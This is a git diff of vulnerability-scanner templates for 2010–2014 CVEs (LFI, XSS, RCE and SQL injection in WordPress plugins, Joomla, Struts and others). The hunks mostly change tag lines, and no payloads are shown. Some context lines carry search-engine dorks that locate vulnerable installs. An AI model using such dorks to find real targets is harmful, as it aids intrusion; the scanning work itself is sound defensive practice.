b/config/nuclei-templates/cves/2010/CVE-2010-4977.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-4977 - tags: cve,cve2010,joomla,lfi + tags: joomla,lfi,edb,packetstorm,cve,cve2010 requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-5028.yaml b/config/nuclei-templates/cves/2010/CVE-2010-5028.yaml index 47bef1878..89303e05b 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-5028.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-5028.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-5028 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-5278.yaml b/config/nuclei-templates/cves/2010/CVE-2010-5278.yaml index 30c2ea201..0c0531670 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-5278.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-5278.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20140803154716/http://secunia.com/advisories/41638/ classification: cve-id: CVE-2010-5278 - tags: cve,cve2010,lfi + tags: cve,cve2010,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-5286.yaml b/config/nuclei-templates/cves/2010/CVE-2010-5286.yaml index 27d0f2ed1..e5ee8dd90 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-5286.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-5286.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-5286 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2011/CVE-2011-0049.yaml b/config/nuclei-templates/cves/2011/CVE-2011-0049.yaml index 359172993..fd9c04a8a 100644 --- a/config/nuclei-templates/cves/2011/CVE-2011-0049.yaml +++ b/config/nuclei-templates/cves/2011/CVE-2011-0049.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2011-0049 - tags: cve,cve2011,majordomo2,lfi + tags: cve,cve2011,majordomo2,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2011/CVE-2011-1669.yaml b/config/nuclei-templates/cves/2011/CVE-2011-1669.yaml index e3186163d..ff691f2ff 100644 --- a/config/nuclei-templates/cves/2011/CVE-2011-1669.yaml +++ b/config/nuclei-templates/cves/2011/CVE-2011-1669.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2011-1669 metadata: google-query: inurl:"/wp-content/plugins/wp-custom-pages/" - tags: cve,cve2011,wordpress,wp-plugin,lfi + tags: edb,cve,cve2011,wordpress,wp-plugin,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2011/CVE-2011-2744.yaml b/config/nuclei-templates/cves/2011/CVE-2011-2744.yaml index b3ac5898b..2049ed51f 100644 --- a/config/nuclei-templates/cves/2011/CVE-2011-2744.yaml +++ b/config/nuclei-templates/cves/2011/CVE-2011-2744.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/ classification: cve-id: CVE-2011-2744 - tags: cve,cve2011,lfi,chyrp + tags: cve,cve2011,lfi,chyrp,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2011/CVE-2011-3315.yaml b/config/nuclei-templates/cves/2011/CVE-2011-3315.yaml index f5589ecd6..7406986eb 100644 --- a/config/nuclei-templates/cves/2011/CVE-2011-3315.yaml +++ b/config/nuclei-templates/cves/2011/CVE-2011-3315.yaml @@ -12,7 +12,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2011-3315 - tags: cve,cve2011,lfi,cisco + tags: cve,cve2011,lfi,cisco,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2011/CVE-2011-4336.yaml b/config/nuclei-templates/cves/2011/CVE-2011-4336.yaml index a9e81fe10..e66d9aed2 100644 --- a/config/nuclei-templates/cves/2011/CVE-2011-4336.yaml +++ b/config/nuclei-templates/cves/2011/CVE-2011-4336.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2011-4336 cwe-id: CWE-79 - tags: cve,cve2011,xss,tikiwiki + tags: seclists,cve,cve2011,xss,tikiwiki requests: - method: GET diff --git a/config/nuclei-templates/cves/2011/CVE-2011-4804.yaml b/config/nuclei-templates/cves/2011/CVE-2011-4804.yaml index 39ecace42..f59ef6a41 100644 --- a/config/nuclei-templates/cves/2011/CVE-2011-4804.yaml +++ b/config/nuclei-templates/cves/2011/CVE-2011-4804.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2011-4804 - tags: cve,cve2011,joomla,lfi + tags: lfi,edb,cve,cve2011,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-0392.yaml b/config/nuclei-templates/cves/2012/CVE-2012-0392.yaml index 0a781e218..4058bcdd5 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-0392.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-0392.yaml @@ -13,7 +13,7 @@ info: remediation: Developers should immediately upgrade to at least Struts 2.3.18. classification: cve-id: CVE-2012-0392 - tags: cve,cve2012,apache,rce,struts,java + tags: cve2012,apache,rce,struts,java,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-0896.yaml b/config/nuclei-templates/cves/2012/CVE-2012-0896.yaml index a9521d9f6..98a228cd0 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-0896.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-0896.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2012-0896 metadata: google-query: inurl:"/wp-content/plugins/count-per-day" - tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal + tags: packetstorm,cve,cve2012,lfi,wordpress,wp-plugin,traversal requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-0901.yaml b/config/nuclei-templates/cves/2012/CVE-2012-0901.yaml index 13b932f29..d4a41a263 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-0901.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-0901.yaml @@ -13,7 +13,7 @@ info: cve-id: CVE-2012-0901 metadata: google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" - tags: cve,cve2012,wordpress,xss,wp-plugin + tags: wp-plugin,packetstorm,cve,cve2012,wordpress,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-0981.yaml b/config/nuclei-templates/cves/2012/CVE-2012-0981.yaml index 09889ce37..abd78bb08 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-0981.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-0981.yaml @@ -12,7 +12,7 @@ info: - http://www.exploit-db.com/exploits/18435 classification: cve-id: CVE-2012-0981 - tags: cve,cve2012,lfi,phpshowtime + tags: phpshowtime,edb,cve,cve2012,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-0991.yaml b/config/nuclei-templates/cves/2012/CVE-2012-0991.yaml index a7c0218a9..3d6345a86 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-0991.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-0991.yaml @@ -12,7 +12,7 @@ info: - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches classification: cve-id: CVE-2012-0991 - tags: cve,cve2012,lfi,openemr,traversal + tags: lfi,openemr,traversal,edb,cve,cve2012 requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-0996.yaml b/config/nuclei-templates/cves/2012/CVE-2012-0996.yaml index 2d2791b54..50bf5aa1a 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-0996.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-0996.yaml @@ -12,7 +12,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2012-0996 - tags: cve,cve2012,lfi + tags: cve,cve2012,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-1226.yaml b/config/nuclei-templates/cves/2012/CVE-2012-1226.yaml index d3d3d0ce5..b0edd8260 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-1226.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-1226.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2012-1226 - tags: cve,cve2012,lfi,dolibarr,traversal + tags: cve,cve2012,lfi,dolibarr,traversal,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-1823.yaml b/config/nuclei-templates/cves/2012/CVE-2012-1823.yaml index 3e9075531..0e4bcec9e 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-1823.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-1823.yaml @@ -13,7 +13,7 @@ info: - http://www.php.net/ChangeLog-5.php#5.4.2 classification: cve-id: CVE-2012-1823 - tags: rce,php,cve,cve2012,kev + tags: cve2012,kev,vulhub,rce,php,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2012/CVE-2012-2371.yaml b/config/nuclei-templates/cves/2012/CVE-2012-2371.yaml index 746afe94f..336b9b3b9 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-2371.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-2371.yaml @@ -12,7 +12,7 @@ info: - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html classification: cve-id: CVE-2012-2371 - tags: cve,cve2012,wordpress,xss,wp-plugin + tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-3153.yaml b/config/nuclei-templates/cves/2012/CVE-2012-3153.yaml index f130b705f..1e32c940b 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-3153.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-3153.yaml @@ -15,7 +15,7 @@ info: - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html classification: cve-id: CVE-2012-3153 - tags: cve,cve2012,oracle,rce + tags: cve,cve2012,oracle,rce,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-4253.yaml b/config/nuclei-templates/cves/2012/CVE-2012-4253.yaml index 01ecdc8ac..c2b2313f2 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-4253.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-4253.yaml @@ -12,7 +12,7 @@ info: - https://exchange.xforce.ibmcloud.com/vulnerabilities/75286 classification: cve-id: CVE-2012-4253 - tags: cve,cve2012,lfi + tags: packetstorm,cve,cve2012,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-4273.yaml b/config/nuclei-templates/cves/2012/CVE-2012-4273.yaml index cae889da6..78c024dfd 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-4273.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-4273.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2012-4273 metadata: google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" - tags: cve,cve2012,wordpress,xss,wp-plugin + tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-4547.yaml b/config/nuclei-templates/cves/2012/CVE-2012-4547.yaml index 9025770e0..d156aed49 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-4547.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-4547.yaml @@ -12,7 +12,7 @@ info: - http://openwall.com/lists/oss-security/2012/10/29/7 classification: cve-id: CVE-2012-4547 - tags: cve,cve2012,xss,awstats + tags: cve,cve2012,xss,awstats,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-4768.yaml b/config/nuclei-templates/cves/2012/CVE-2012-4768.yaml index 567af8b6e..a82f0d6a6 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-4768.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-4768.yaml @@ -11,7 +11,7 @@ info: - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html classification: cve-id: CVE-2012-4768 - tags: cve,cve2012,wordpress,xss,wp-plugin + tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-4878.yaml b/config/nuclei-templates/cves/2012/CVE-2012-4878.yaml index 1e1bfafaf..b4dcf437f 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-4878.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-4878.yaml @@ -12,7 +12,7 @@ info: - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html classification: cve-id: CVE-2012-4878 - tags: cve,cve2012,lfi,traversal + tags: cve2012,lfi,traversal,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-4889.yaml b/config/nuclei-templates/cves/2012/CVE-2012-4889.yaml index e59e255ca..124023175 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-4889.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-4889.yaml @@ -12,7 +12,7 @@ info: - http://www.vulnerability-lab.com/get_content.php?id=437 classification: cve-id: CVE-2012-4889 - tags: cve,cve2012,xss,manageengine + tags: cve,cve2012,xss,manageengine,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-4940.yaml b/config/nuclei-templates/cves/2012/CVE-2012-4940.yaml index 8736b5b3a..2b05afdf8 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-4940.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-4940.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210121232008/https://www.securityfocus.com/bid/56343/ classification: cve-id: CVE-2012-4940 - tags: cve,cve2012,axigen,lfi,mail + tags: edb,cve,cve2012,axigen,lfi,mail requests: - method: GET diff --git a/config/nuclei-templates/cves/2012/CVE-2012-5913.yaml b/config/nuclei-templates/cves/2012/CVE-2012-5913.yaml index 35eef6218..8ee8c216c 100644 --- a/config/nuclei-templates/cves/2012/CVE-2012-5913.yaml +++ b/config/nuclei-templates/cves/2012/CVE-2012-5913.yaml @@ -12,7 +12,7 @@ info: - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt classification: cve-id: CVE-2012-5913 - tags: cve,cve2012,wordpress,xss,wp-plugin + tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2013/CVE-2013-2248.yaml b/config/nuclei-templates/cves/2013/CVE-2013-2248.yaml index 88d17c92a..49e8789f6 100644 --- a/config/nuclei-templates/cves/2013/CVE-2013-2248.yaml +++ b/config/nuclei-templates/cves/2013/CVE-2013-2248.yaml @@ -13,7 +13,7 @@ info: remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. classification: cve-id: CVE-2013-2248 - tags: cve,cve2013,apache,redirect,struts + tags: cve,cve2013,apache,redirect,struts,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2013/CVE-2013-3526.yaml b/config/nuclei-templates/cves/2013/CVE-2013-3526.yaml index 55356a1c0..844ec4aca 100644 --- a/config/nuclei-templates/cves/2013/CVE-2013-3526.yaml +++ b/config/nuclei-templates/cves/2013/CVE-2013-3526.yaml @@ -13,7 +13,7 @@ info: cve-id: CVE-2013-3526 metadata: google-query: inurl:"/wp-content/plugins/trafficanalyzer" - tags: cve,cve2013,wordpress,xss,wp-plugin + tags: packetstorm,cve,cve2013,wordpress,xss,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2013/CVE-2013-3827.yaml b/config/nuclei-templates/cves/2013/CVE-2013-3827.yaml index 17e8872b6..055959122 100644 --- a/config/nuclei-templates/cves/2013/CVE-2013-3827.yaml +++ b/config/nuclei-templates/cves/2013/CVE-2013-3827.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html classification: cve-id: CVE-2013-3827 - tags: cve,cve2013,lfi,javafaces,oracle + tags: edb,cve,cve2013,lfi,javafaces,oracle requests: - method: GET diff --git a/config/nuclei-templates/cves/2013/CVE-2013-4117.yaml b/config/nuclei-templates/cves/2013/CVE-2013-4117.yaml index 699d1e285..fd7b3fdb0 100644 --- a/config/nuclei-templates/cves/2013/CVE-2013-4117.yaml +++ b/config/nuclei-templates/cves/2013/CVE-2013-4117.yaml @@ -13,7 +13,7 @@ info: cve-id: CVE-2013-4117 metadata: google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" - tags: cve,cve2013,wordpress,xss,wp-plugin + tags: cve2013,wordpress,xss,wp-plugin,seclists,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2013/CVE-2013-4625.yaml b/config/nuclei-templates/cves/2013/CVE-2013-4625.yaml index e0e8226c0..4d9ceaff9 100644 --- a/config/nuclei-templates/cves/2013/CVE-2013-4625.yaml +++ b/config/nuclei-templates/cves/2013/CVE-2013-4625.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2013-4625 metadata: google-query: inurl:"/wp-content/plugins/duplicator" - tags: cve,cve2013,wordpress,xss,wp-plugin + tags: seclists,cve,cve2013,wordpress,xss,wp-plugin,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2013/CVE-2013-5528.yaml b/config/nuclei-templates/cves/2013/CVE-2013-5528.yaml index 054a82604..ce41d2e41 100644 --- a/config/nuclei-templates/cves/2013/CVE-2013-5528.yaml +++ b/config/nuclei-templates/cves/2013/CVE-2013-5528.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/ classification: cve-id: CVE-2013-5528 - tags: cve,cve2013,lfi,cisco + tags: cve,cve2013,lfi,cisco,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2013/CVE-2013-5979.yaml b/config/nuclei-templates/cves/2013/CVE-2013-5979.yaml index 7ad29aa3c..c0dbc559d 100644 --- a/config/nuclei-templates/cves/2013/CVE-2013-5979.yaml +++ b/config/nuclei-templates/cves/2013/CVE-2013-5979.yaml @@ -12,7 +12,7 @@ info: - https://bugs.launchpad.net/xibo/+bug/1093967 classification: cve-id: CVE-2013-5979 - tags: cve,cve2013,lfi + tags: cve,cve2013,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2013/CVE-2013-6281.yaml b/config/nuclei-templates/cves/2013/CVE-2013-6281.yaml index 36ea3c175..2fb9f4d86 100644 --- a/config/nuclei-templates/cves/2013/CVE-2013-6281.yaml +++ b/config/nuclei-templates/cves/2013/CVE-2013-6281.yaml @@ -20,7 +20,7 @@ info: metadata: google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet verified: "true" - tags: cve,cve2013,wordpress,xss,wp-plugin,wp + tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin requests: - raw: diff --git a/config/nuclei-templates/cves/2013/CVE-2013-7091.yaml b/config/nuclei-templates/cves/2013/CVE-2013-7091.yaml index 62f5b508b..4b85478df 100644 --- a/config/nuclei-templates/cves/2013/CVE-2013-7091.yaml +++ b/config/nuclei-templates/cves/2013/CVE-2013-7091.yaml @@ -12,7 +12,7 @@ info: - http://www.exploit-db.com/exploits/30085 classification: cve-id: CVE-2013-7091 - tags: cve,cve2013,zimbra,lfi + tags: zimbra,lfi,edb,cve,cve2013 requests: - method: GET diff --git a/config/nuclei-templates/cves/2013/CVE-2013-7240.yaml b/config/nuclei-templates/cves/2013/CVE-2013-7240.yaml index 3a5f9b1ad..50edd26a4 100644 --- a/config/nuclei-templates/cves/2013/CVE-2013-7240.yaml +++ b/config/nuclei-templates/cves/2013/CVE-2013-7240.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-22 metadata: google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" - tags: cve,cve2013,wordpress,wp-plugin,lfi + tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-10037.yaml b/config/nuclei-templates/cves/2014/CVE-2014-10037.yaml index 37bbb8da0..b7fc75f5c 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-10037.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-10037.yaml @@ -12,7 +12,7 @@ info: - http://www.exploit-db.com/exploits/30865 classification: cve-id: CVE-2014-10037 - tags: cve,cve2014,lfi + tags: cve,cve2014,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-1203.yaml b/config/nuclei-templates/cves/2014/CVE-2014-1203.yaml index 9f97f2fc0..d8e32964a 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-1203.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-1203.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2014-1203 cwe-id: CWE-77 - tags: rce,eyou + tags: seclists,rce,eyou requests: - raw: diff --git a/config/nuclei-templates/cves/2014/CVE-2014-2323.yaml b/config/nuclei-templates/cves/2014/CVE-2014-2323.yaml index c81373081..8b91e2822 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-2323.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-2323.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2014-2323 cwe-id: CWE-89 - tags: cve,cve2014,sqli,lighttpd,injection + tags: lighttpd,injection,seclists,cve,cve2014,sqli requests: - raw: diff --git a/config/nuclei-templates/cves/2014/CVE-2014-2383.yaml b/config/nuclei-templates/cves/2014/CVE-2014-2383.yaml index 0158e23ce..8ca6ae101 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-2383.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-2383.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2014-2383 metadata: verified: "true" - tags: cve,cve2014,dompdf,lfi,wordpress,wp-plugin,wp + tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-2908.yaml b/config/nuclei-templates/cves/2014/CVE-2014-2908.yaml index a7a471167..9322e7973 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-2908.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-2908.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to v4.0 or later. classification: cve-id: CVE-2014-2908 - tags: cve,cve2014,xss,siemens + tags: cve,cve2014,xss,siemens,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-3120.yaml b/config/nuclei-templates/cves/2014/CVE-2014-3120.yaml index 266c11eb8..66375d0ae 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-3120.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-3120.yaml @@ -13,7 +13,7 @@ info: - http://bouk.co/blog/elasticsearch-rce/ classification: cve-id: CVE-2014-3120 - tags: cve,cve2014,elastic,rce,elasticsearch,kev + tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic requests: - raw: diff --git a/config/nuclei-templates/cves/2014/CVE-2014-3206.yaml b/config/nuclei-templates/cves/2014/CVE-2014-3206.yaml index 93e697d67..64af96912 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-3206.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-3206.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2014-3206 cwe-id: CWE-20 - tags: cve,cve2014,seagate,rce + tags: cve,cve2014,seagate,rce,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2014/CVE-2014-3704.yaml b/config/nuclei-templates/cves/2014/CVE-2014-3704.yaml index 15b2c5363..76fd15724 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-3704.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-3704.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-3704 metadata: shodan-query: http.component:"drupal" - tags: cve,cve2014,drupal,sqli + tags: edb,cve,cve2014,drupal,sqli variables: num: "999999999" diff --git a/config/nuclei-templates/cves/2014/CVE-2014-4535.yaml b/config/nuclei-templates/cves/2014/CVE-2014-4535.yaml index 23d27ce4b..9f511ac28 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-4535.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-4535.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4535 cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-4536.yaml b/config/nuclei-templates/cves/2014/CVE-2014-4536.yaml index 0fa698a91..08c92acd7 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-4536.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-4536.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" - tags: cve,cve2014,wordpress,wp-plugin,xss + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-4539.yaml b/config/nuclei-templates/cves/2014/CVE-2014-4539.yaml index 8db0320e5..d0f675dbe 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-4539.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-4539.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4539 cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss + tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014 requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-4544.yaml b/config/nuclei-templates/cves/2014/CVE-2014-4544.yaml index df4e9ea1b..9736f2741 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-4544.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-4544.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4544 cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-4550.yaml b/config/nuclei-templates/cves/2014/CVE-2014-4550.yaml index 672afcb4d..0a91783d6 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-4550.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-4550.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: google-query: inurl:"/wp-content/plugins/shortcode-ninja" - tags: cve,cve2014,wordpress,wp-plugin,xss + tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014 requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-4558.yaml b/config/nuclei-templates/cves/2014/CVE-2014-4558.yaml index 8cd16f4e7..280f1137b 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-4558.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-4558.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4558 cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-4561.yaml b/config/nuclei-templates/cves/2014/CVE-2014-4561.yaml index bac48b387..17da9ecfc 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-4561.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-4561.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4561 cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss,weather + tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-4592.yaml b/config/nuclei-templates/cves/2014/CVE-2014-4592.yaml index b1dce1048..462d1ba75 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-4592.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-4592.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: google-query: inurl:"/wp-content/plugins/wp-planet" - tags: cve,cve2014,wordpress,wp-plugin,xss + tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-4942.yaml b/config/nuclei-templates/cves/2014/CVE-2014-4942.yaml index 8ddffe57f..e1d2449c9 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-4942.yaml +++ b/config/nuclei-templates/cves/2014/CVE-2014-4942.yaml @@ -13,7 +13,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 classification: cve-id: CVE-2014-4942 - tags: cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure + tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure requests: - method: GET diff --git a/config/nuclei-templates/cves/2014/CVE-2014-5111.yaml b/config/nuclei-templates/cves/2014/CVE-2014-5111.yaml index f8a4d0004..66b9614ad 100644 --- a/config/nuclei-templates/cves/2014/CVE-2014-5111.yaml +++ 